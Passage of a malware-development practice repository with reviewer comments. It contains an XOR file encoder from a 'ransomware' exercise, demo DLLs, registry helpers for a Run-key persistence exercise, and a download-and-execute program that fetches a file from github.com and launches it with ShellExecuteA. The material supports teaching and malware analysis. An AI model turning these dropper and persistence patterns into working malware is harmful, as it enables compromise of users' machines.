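 * Returns 1 when `key` is a non-empty string of decimal digits, else 0.
 * An empty string is now rejected: the original accepted it, and atoi("")
 * in the caller yields 0, which turns the XOR pass into a no-op.
 *
 * NOTE(review): there is still no range check - very long digit strings
 * overflow atoi() in the caller, and since the buffer elements are chars
 * only the low byte of the key effectively takes part in the XOR.
 */
int isValidXorKey(const char *key)
{
    // xor key must be numeric and must have at least one digit
    if (key == NULL || key[0] == '\0')
        return 0;
    for (; *key != '\0'; key++)
        if (*key < '0' || *key > '9')
            return 0;
    return 1;
}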
26 |
/*
 * Returns the size of `filename` in bytes by seeking to the end and reading
 * the stream offset. Exits the process with code 2 if the file cannot be
 * opened for reading.
 *
 * NOTE(review): the fseek()/ftell() results are not checked. ftell() returns
 * a long, so where long is 32-bit a file over 2 GiB is mis-sized, and a -1
 * error result is silently converted to a huge unsigned value that the
 * caller then passes to malloc().
 */
unsigned long long getSizeOfFile(char *filename)
{
    FILE *fptr = NULL;
    unsigned long long sizeOfFile = 0;
    if ((fptr = fopen(filename, "rb")) == NULL) {
        printf(" [-] Error! Opening file \'%s\' for calculating size.\n", filename); exit(2);
    }

    fseek(fptr, 0L, SEEK_END);      // return value unchecked
    sizeOfFile = ftell(fptr);       // long -> unsigned long long, -1 becomes ULLONG_MAX
    fclose(fptr);
    return sizeOfFile;
}
40 |
/*
 * Reads exactly `filesize` bytes from `filename` into `buffer`; the caller
 * must have allocated at least `filesize` bytes (see main()).
 * Exits with code 2 if the file cannot be opened and 3 if fewer bytes than
 * expected are read. The error branches skip fclose(); exit() flushes and
 * closes open streams, so nothing leaks, but only the success path closes
 * the file explicitly.
 */
void readFileBinary(char *buffer, char *filename, unsigned long long filesize)
{
    FILE *fptr = NULL;
    unsigned long long numberOfBytes = 0;

    if ((fptr = fopen(filename, "rb")) == NULL) {
        printf(" [-] Error! Opening file \'%s\' for reading.\n", filename); exit(2);
    }

    // Single fread of the whole file; a short count is treated as fatal
    numberOfBytes = fread(buffer, 1, filesize, fptr);
    if (numberOfBytes != filesize) {
        printf(" [-] Error! Reading file\n"); exit(3);
    }

    fclose(fptr);
}
57 |
/*
 * Writes `filesize` bytes from `buffer` to `filename`, creating or
 * truncating the file ("wb").
 * Exits with code 2 if the file cannot be opened and 4 if fewer bytes than
 * requested are written. As in readFileBinary(), the error branches rely on
 * exit() to flush and close the stream.
 */
void writeFileBinary(char *buffer, char *filename, unsigned long long filesize)
{
    FILE *fptr = NULL;
    unsigned long long numberOfBytes = 0;

    if ((fptr = fopen(filename, "wb")) == NULL) {
        printf(" [-] Error! Opening file \'%s\' for writing.\n", filename); exit(2);
    }

    // Single fwrite of the whole buffer; a short count is treated as fatal
    numberOfBytes = fwrite(buffer, 1, filesize, fptr);
    if (numberOfBytes != filesize) {
        printf(" [-] Error! Writing file\n"); exit(4);
    }

    fclose(fptr);
}
74 |
/*
 * XORs each of the first `filesize` bytes of `buffer` in place with
 * `xorKey`. Because the elements are chars, only the low byte of the key
 * effectively takes part. Applying the same key again restores the
 * original bytes.
 */
void bufferEncoding(char *buffer, int xorKey, unsigned long long filesize)
{
    char *cursor = buffer;
    char *end = buffer + filesize;
    while (cursor != end) {
        *cursor ^= xorKey;
        ++cursor;
    }
}
81 |
/*
 * Entry point of the XOR file encoder: takes an input path, a decimal key
 * and an output path. Reads the whole input into memory, XORs every byte
 * with the key and writes the result to the output path.
 * Exit codes: 5 wrong argument count or non-numeric key, 2 cannot open a
 * file, 3 read error or allocation failure, 4 write error, 0 success.
 *
 * NOTE(review): argv[0], argv[1] and argv[3] are copied with strcpy() into
 * fixed 50-byte stack buffers with no length check, so a longer program
 * path or file name overruns them. malloc(0) for an empty input may return
 * NULL on some implementations and is then reported as an allocation
 * failure. A fixed single-byte XOR is undone by running the tool again with
 * the same key; this is obfuscation, not encryption.
 */
int main(int argc, char const *argv[])
{
    // Get program name: the text after the last backslash of argv[0]
    char progName[50];
    char *lastToken = strrchr(argv[0], '\\');

    if (lastToken != NULL) strcpy(progName, lastToken + 1);   // unbounded copy, see note above
    else strcpy(progName, argv[0]);

    // Check arguments
    if (argc != 4) {
        printf_usage(progName); exit(5);
    }

    char fileIn[50], fileOut[50];
    int xorKey = 0;

    // Parsing arguments
    strcpy(fileIn, argv[1]);                       // unbounded copy
    if (isValidXorKey(argv[2])) {
        xorKey = atoi(argv[2]);                    // digits only, no range check: values above 255 lose their high bits per byte
    } else {
        printf(" [-] Error! Invalid key. The encrypt key must be numberic!\n"); exit(5);
    }
    strcpy(fileOut, argv[3]);                      // unbounded copy

    char *buffer = NULL;
    unsigned long long sizeOfFile = 0;

    // Obtain file size
    sizeOfFile = getSizeOfFile(fileIn);

    // Allocate memory to contain the whole file
    buffer = (char *)malloc(sizeOfFile * sizeof(char));
    if (buffer == NULL) {
        printf(" [-] Error! Memory not allocated.\n"); exit(3);
    }

    // Reading file to buffer
    readFileBinary(buffer, fileIn, sizeOfFile);

    // Encoding payload (in place)
    bufferEncoding(buffer, xorKey, sizeOfFile);

    // Write buffer to new file
    writeFileBinary(buffer, fileOut, sizeOfFile);

    // Terminate
    free(buffer);

    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex11_Simple_Ransomware/Ex11_Simple_Ransomware.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex11_Simple_Ransomware/Ex11_Simple_Ransomware.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_1_Simple_DLL_No_Export/Ex12_1_Simple_DLL_No_Export.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | /*
4 | ** Visual Studio Configuration Precompiled Header
5 | ** Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
6 | ** => Xóa hết các file header .h và các file phụ khác do Visual Studio sinh ra. Chỉ để dllmain.cpp hoặc dllmain.c
7 | */
8 |
/*
 * DLL entry point with no exports. Shows a warning message box once, on
 * DLL_PROCESS_ATTACH; every other notification is ignored. Always returns
 * TRUE so the load succeeds.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(0, "This is DllMain.", "Simple DLL", MB_OK | MB_ICONWARNING);
        break;
    default:
        break;
    }

    return TRUE;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_1_Simple_DLL_No_Export/Ex12_1_Simple_DLL_No_Export.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_1_Simple_DLL_No_Export/Ex12_1_Simple_DLL_No_Export.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_2_Simple_DLL_Func_Exported/Ex12_2_Simple_DLL_Func_Exported.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma warning(disable : 4996)
5 |
6 | #define DllExport __declspec(dllexport)
7 |
8 |
9 | /*
10 | ** VS Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
11 | ** VS Project > Properties > Linker > All Option > General Debug Info > No
12 | ** Xóa các header file do VS tự động tạo ra.
13 | ** Ref:
14 | ** 1. MSDN - dllexport, dllimport
15 | https://docs.microsoft.com/en-us/cpp/cpp/dllexport-dllimport
16 | */
17 |
/* Returns a + b; internal helper, not exported. */
int sum(int a, int b) {
    const int total = a + b;
    return total;
}
21 |
/* Returns a * b; internal helper, not exported. */
int mul(int a, int b) {
    const int product = a * b;
    return product;
}
25 |
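/*
 * The single exported function of this DLL. Formats a fixed 11 * 9 product
 * and shows it in a warning message box captioned "func".
 * snprintf() bounds the write to the 50-byte buffer; the original used
 * sprintf(), which fits today but has no bound.
 */
DllExport void func() {
    char buffer[50] = { 0 };
    int a = 11, b = 9;

    snprintf(buffer, sizeof(buffer), "This is func() exported.\n%d * %d = %d", a, b, mul(a, b));
    MessageBoxA(0, buffer, "func", MB_OK | MB_ICONWARNING);
}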
33 |
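/*
 * DLL entry point. On DLL_PROCESS_ATTACH it formats a fixed 10 + 9 sum and
 * shows it in a warning message box; other notifications do nothing.
 * Always returns TRUE so the load succeeds.
 * snprintf() bounds the write to the 50-byte buffer; the original used
 * sprintf(), which fits today but has no bound.
 *
 * NOTE(review): showing UI from DllMain runs under the loader lock, which
 * the DllMain guidelines advise against. For this demo it is the visible
 * proof that the DLL was loaded.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        // Work done at process attach: format a message and show it
        char buffer[50] = { 0 };
        int a = 10, b = 9;

        snprintf(buffer, sizeof(buffer), "This is DllMain.\n%d + %d = %d", a, b, sum(a, b));
        MessageBoxA(0, buffer, "DllMain", MB_OK | MB_ICONWARNING);
    }

    return TRUE;
}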
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_2_Simple_DLL_Func_Exported/Ex12_2_Simple_DLL_Func_Exported.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_2_Simple_DLL_Func_Exported/Ex12_2_Simple_DLL_Func_Exported.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex13_Simple_Downloader/Ex13_Simple_Downloader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "urlmon.lib")
6 |
7 | /*
8 | ** Ref:
9 | ** 1. MSDN
10 | ** https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)
11 | ** 2. Should I use URLDownloadToFile?
12 | ** https://stackoverflow.com/a/5185008
13 | */
14 |
/*
 * Download-and-execute proof of concept: fetches a fixed URL into the
 * current working directory with URLDownloadToFileA and then opens the
 * saved file through ShellExecuteA. The Sleep() calls appear to only pace
 * the console output.
 *
 * NOTE(review): wsprintfA() is called with filePath as both the destination
 * and the %s source; overlapping buffers are undefined for the printf
 * family, so the path should be formatted into a second buffer. The
 * GetCurrentDirectoryA() return value is unchecked, and TCHAR/TEXT() are
 * mixed with the explicitly ANSI ...A functions, so this only compiles
 * with UNICODE undefined.
 * From a defender's side the observable chain is a urlmon download into
 * the process's working directory followed by a ShellExecute of that
 * newly written file.
 */
int main()
{
    TCHAR url[] = TEXT("http://github.com/fluidicon.png");   // fixed source URL
    TCHAR filePath[MAX_PATH];

    // Current working directory (return value unchecked; on failure filePath stays uninitialised)
    GetCurrentDirectoryA(MAX_PATH, filePath);

    // Format path to save downloaded file.
    // NOTE(review): source and destination overlap here - undefined behaviour.
    wsprintfA(filePath, TEXT("%s\\fluidicon.png"), filePath);

    // Download file from url; blocks until the transfer finishes and returns a COM-style result
    HRESULT hRes = URLDownloadToFileA(NULL, url, filePath, 0, NULL);
    Sleep(400);

    // Print result
    if (hRes == S_OK) {
        printf(" [+] File download successfully.\n");
        Sleep(400);
        printf(" [+] Saved to: %s\n", filePath);
        Sleep(400);
        printf(" [+] Executing file dropped..!");
        Sleep(400);
        // Open file downloaded using ShellExecuteA() API; the registered handler
        // for the file type decides what the "open" verb does.
        ShellExecuteA(NULL, "open", filePath, NULL, NULL, 1);
    }
    else if (hRes == E_OUTOFMEMORY) {
        printf(" [-] The buffer length is invalid.\n");
    }
    else if (hRes == INET_E_DOWNLOAD_FAILURE) {
        printf(" [-] The specified resource or callback interface was invalid.\n");
    }
    else {
        printf(" [-] Unknown Error!\n");
    }

    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex13_Simple_Downloader/Ex13_Simple_Downloader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex13_Simple_Downloader/Ex13_Simple_Downloader.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex14_Simple_Dropper/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/fluidicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex14_Simple_Dropper/fluidicon.png
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex14_Simple_Dropper.rc
4 | //
5 | #define IDB_PNG1 101
6 | #define IDR_BIN1 102
7 |
8 | // Next default values for new objects
9 | //
10 | #ifdef APSTUDIO_INVOKED
11 | #ifndef APSTUDIO_READONLY_SYMBOLS
12 | #define _APS_NEXT_RESOURCE_VALUE 103
13 | #define _APS_NEXT_COMMAND_VALUE 40001
14 | #define _APS_NEXT_CONTROL_VALUE 1001
15 | #define _APS_NEXT_SYMED_VALUE 101
16 | #endif
17 | #endif
18 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex15_Simple_Ransomware_AES128/Ex15_Simple_Ransomware_AES128.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex15_Simple_Ransomware_AES128/Ex15_Simple_Ransomware_AES128.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.txt
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex17_Simple_Keylogger2/Ex17_Simple_Keylogger2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex17_Simple_Keylogger2/Ex17_Simple_Keylogger2.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/MyRegistry.c:
--------------------------------------------------------------------------------
1 | #include "MyRegistry.h"
2 |
/*
* Example usage (the function names below match the declarations in
* MyRegistry.h; the key/value arguments are wide strings, hence the L prefix):
BOOL status;
DWORD readData;
PWCHAR readMessage = NULL;

status = CreateRegistryKey(HKEY_CURRENT_USER, L"Aticleworld"); //create key
if (status != TRUE) return FALSE;

status = WriteDwordToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", 12082016); //write dword
if (status != TRUE) return FALSE;

status = ReadDwordFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", &readData); //read dword
if (status != TRUE) return FALSE;
printf("%lu", readData);

status = WriteStringToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", L"Happy"); //write string
if (status != TRUE) return FALSE;

status = ReadStringFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", &readMessage); //read string
if (status != TRUE) return FALSE;
if (readMessage != NULL) {
printf(" Message = %S\n", readMessage);
free(readMessage); // buffer is allocated by ReadStringFromRegistry and owned by the caller
readMessage = NULL;
}
*/
30 |
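/*
 * Create the subkey `subkey` under hKeyParent, or open it if it already exists,
 * and immediately close the handle. The function therefore only reports whether
 * the key now exists and could be opened.
 *
 * hKeyParent: an open parent key (for example HKEY_CURRENT_USER).
 * subkey:     wide-character subkey path relative to hKeyParent; NULL is rejected.
 * Returns TRUE on success, FALSE on any error (the Win32 error code is printed).
 *
 * Fix: the original printed GetLastError(), which the Reg* functions do not set;
 * they return the Win32 error code directly, so that value is what gets printed.
 */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
{
    HKEY hKey = NULL;
    DWORD dwDisposition = 0;   // REG_CREATED_NEW_KEY or REG_OPENED_EXISTING_KEY; not needed by callers
    LONG Ret;

    if (subkey == NULL)
        return FALSE;

    // KEY_ALL_ACCESS is kept from the original; since the handle is closed right
    // away, a narrower mask such as KEY_WRITE would also be sufficient here.
    Ret = RegCreateKeyEx(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
    if (Ret != ERROR_SUCCESS) {
        // hKey holds no valid handle on failure, so nothing is closed here.
        printf(" [-] Error Opening or Creating new key. Code = %ld\n", Ret);
        return FALSE;
    }

    RegCloseKey(hKey);
    return TRUE;
}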
46 |
/*
 * Store `data` as a REG_DWORD value named valueName under hKeyParent\subkey.
 * The subkey must already exist; it is opened with KEY_WRITE only.
 *
 * Returns TRUE when the value was written, FALSE if the key could not be
 * opened or the value could not be set. The key handle is always closed.
 */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
{
    HKEY hKey;
    BOOL written = FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // The DWORD is passed by address; sizeof(data) is the REG_DWORD payload size.
    if (RegSetValueEx(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data)) == ERROR_SUCCESS)
        written = TRUE;

    RegCloseKey(hKey);
    return written;
}
65 |
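/*
 * Store the NUL-terminated wide string strData as a REG_SZ value named
 * valueName under hKeyParent\subkey. The subkey must already exist.
 *
 * The byte count handed to RegSetValueEx includes the terminating NUL, as the
 * API expects for REG_SZ, and is derived from sizeof(WCHAR) rather than the
 * literal 2 used originally.
 *
 * Fix: a NULL strData is rejected instead of being passed to lstrlen/RegSetValueEx,
 * which would have written from a NULL pointer.
 * Returns TRUE when the value was written, FALSE otherwise.
 */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
{
    HKEY hKey;
    DWORD cbData;
    BOOL written = FALSE;

    if (strData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Size in bytes including the terminator: (characters + 1) * sizeof(WCHAR).
    cbData = ((DWORD)lstrlenW(strData) + 1) * sizeof(WCHAR);
    if (RegSetValueEx(hKey, valueName, 0, REG_SZ, (LPBYTE)strData, cbData) == ERROR_SUCCESS)
        written = TRUE;

    RegCloseKey(hKey);
    return written;
}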
82 |
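/*
 * Read the REG_DWORD value valueName under hKeyParent\subkey into *readData.
 *
 * Fix: the original returned TRUE even when RegQueryValueEx failed, so callers
 * would use an uninitialised *readData; it also accepted any 4-byte value
 * regardless of its registry type. Now TRUE is returned only when the value
 * exists, has type REG_DWORD and was read in full; on failure *readData is
 * left untouched.
 *
 * readData: output pointer; NULL is rejected.
 * Returns TRUE on success, FALSE otherwise. The key handle is always closed.
 */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData)
{
    HKEY hKey;
    DWORD data = 0;
    DWORD len = sizeof(data);   // in: buffer size, out: bytes stored
    DWORD type = REG_NONE;
    BOOL ok = FALSE;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Ask for the type as well so a same-sized value of another type is not
    // silently interpreted as a DWORD.
    if (RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)&data, &len) == ERROR_SUCCESS
        && type == REG_DWORD && len == sizeof(data)) {
        *readData = data;
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}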
105 |
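/*
 * Read the string value valueName under hKeyParent\subkey into a newly
 * allocated, NUL-terminated wide-string buffer. On success *readData receives
 * the buffer and the caller releases it with free(); on failure *readData is
 * untouched and no memory is leaked.
 *
 * The buffer starts at TOTAL_BYTES_READ bytes and grows by OFFSET_BYTES while
 * RegQueryValueEx reports ERROR_MORE_DATA.
 *
 * Fixes relative to the original:
 *  - the buffer was allocated as sizeof(PWCHAR)*len bytes while the API was
 *    told it held len bytes (inconsistent sizing);
 *  - a failed realloc overwrote the only pointer to the old buffer;
 *  - the buffer leaked on every error path;
 *  - RegQueryValueEx does not guarantee a terminating NUL, so one is now
 *    written explicitly;
 *  - only REG_SZ and REG_EXPAND_SZ values are accepted.
 *
 * readData: output pointer; NULL is rejected.
 * Returns TRUE on success, FALSE otherwise. The key handle is always closed.
 */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData)
{
    HKEY hKey;
    DWORD len = TOTAL_BYTES_READ;   // capacity of readBuffer, in bytes
    DWORD readDataLen;              // bytes the API needs (ERROR_MORE_DATA) or wrote (success)
    DWORD type = REG_NONE;
    PWCHAR readBuffer;
    PWCHAR grown;
    LONG Ret;
    size_t nChars;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Allocate exactly the capacity reported to the API.
    readBuffer = (PWCHAR)malloc(len);
    if (readBuffer == NULL) {
        RegCloseKey(hKey);
        return FALSE;
    }

    readDataLen = len;
    Ret = RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)readBuffer, &readDataLen);
    while (Ret == ERROR_MORE_DATA) {
        // Keep the old pointer until realloc succeeds so a failure does not leak it.
        len += OFFSET_BYTES;
        grown = (PWCHAR)realloc(readBuffer, len);
        if (grown == NULL) {
            free(readBuffer);
            RegCloseKey(hKey);
            return FALSE;
        }
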